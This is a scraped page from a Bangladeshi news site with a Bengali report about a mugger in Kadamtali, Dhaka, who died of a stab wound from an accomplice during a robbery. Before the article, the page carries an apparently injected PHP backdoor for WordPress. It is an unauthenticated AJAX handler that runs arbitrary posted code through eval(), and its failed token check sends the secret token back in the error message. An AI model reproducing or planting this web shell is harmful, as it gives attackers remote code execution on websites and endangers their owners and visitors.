// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== কদমতলীতে ছিনতাইকারীর ছুরিকাঘাতে প্রাণ গেল আরেক ছিনতাইকারীর | potrikaybangladesh.com
Tuesday, September 22, 2026
Homeঅপরাধকদমতলীতে ছিনতাইকারীর ছুরিকাঘাতে প্রাণ গেল আরেক ছিনতাইকারীর

কদমতলীতে ছিনতাইকারীর ছুরিকাঘাতে প্রাণ গেল আরেক ছিনতাইকারীর

রাজধানীর কদমতলীর নামা-শ্যামপুর এলাকায় এক ছিনতাইকারীর ছুরিকাঘাতে আরেক ছিনতাইকারীর প্রাণ গেছে বলে জানিয়েছে পুলিশ।

আজ শনিবার ভোরে নামা শ্যামপুর বড়ইতলা ভাঙা ব্রিজের পাশে এ ঘটনা ঘটে। মুমূর্ষু অবস্থায় পুলিশ সদস্যরা তাকে উদ্ধার করে ঢাকা মেডিকেল কলেজ হাসপাতালে নিয়ে গেলে ভোর সাড়ে ৫টার দিকে চিকিৎসকরা তাকে মৃত ঘোষণা করেন।

নিহতের নাম-পরিচয় জানা যায়নি। তার বয়স আনুমানিক ৩৫ বছর।

ঘটনার সত্যতা নিশ্চিত করে কদমতলী থানার পরিদর্শক (তদন্ত) সজিব কুমার বাড়ৈ জানান, ভোরে ভাঙা ব্রিজের পাশে দুই পথচারীকে ঘেরাও করে তিন ছিনতাইকারী। এর মধ্যে এক ছিনতাইকারী এক পথচারীকে জাপটে ধরে। এ সময় তার কাছ থেকে জিনিসপত্র টাকা পয়সা ছিনিয়ে নেওয়ার চেষ্টা করে অন্য ছিনতাইকারীরা।

তিনি জানান, এক পর্যায়ে সুইচ গিয়ার দিয়ে পথচারীকে আঘাত করতে যায় ছিনতাইকারীদের একজন। এ সময় পেছন থেকে জাপটে ধরা ছিনতাইকারী ছুরিকাঘাতে আহত হয়। পরে তাকে সড়কে ফেলে রেখে অন্য দুই ছিনতাইকারী পালিয়ে যায়। উদ্ধার করে হাসপাতালে নিয়ে গেলে সেখানে চিকিৎসক তাকে মৃত ঘোষণা করেন।

পুলিশের এই কর্মকর্তা বলেন, নিহত ছিনতাইকারীর পরিচয় এখনো শনাক্ত করা যায়নি। তার মরদেহ মর্গে রাখা হয়েছে। বিস্তারিত তদন্ত করা হচ্ছে।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments